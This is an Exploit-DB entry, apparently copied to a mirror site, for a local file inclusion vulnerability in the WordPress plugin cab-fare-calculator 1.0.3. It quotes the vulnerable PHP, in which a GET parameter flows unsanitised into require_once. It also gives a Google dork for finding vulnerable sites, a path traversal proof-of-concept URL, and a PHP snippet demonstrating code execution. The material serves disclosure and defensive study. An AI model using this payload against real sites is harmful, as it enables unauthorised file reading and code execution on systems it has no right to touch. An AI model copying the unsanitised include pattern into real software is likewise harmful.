[webapps] WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
2022-3-30 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:14 收藏
2022-3-30 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:14 收藏
# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
# Version: 1.0.3
# Tested on: Firefox
# Vulnerable File: tblight.php
# Impact:
Local File Read / Code Execution
# Vulnerable Code:
```
if(!empty($_GET['controller']) && !empty($_GET['action']) &&
!empty($_GET['ajax']) && $_GET['ajax'] == 1)
{
require_once('' . 'controllers/'.$_GET['controller'].'.php');
}
```
# Proof of concept:
http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1
# POC Code Execution:
/etc/index.php:
<?php echo "Local file read"; phpinfo(); ?>
文章来源: https://www.exploit-db.com/exploits/50843
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh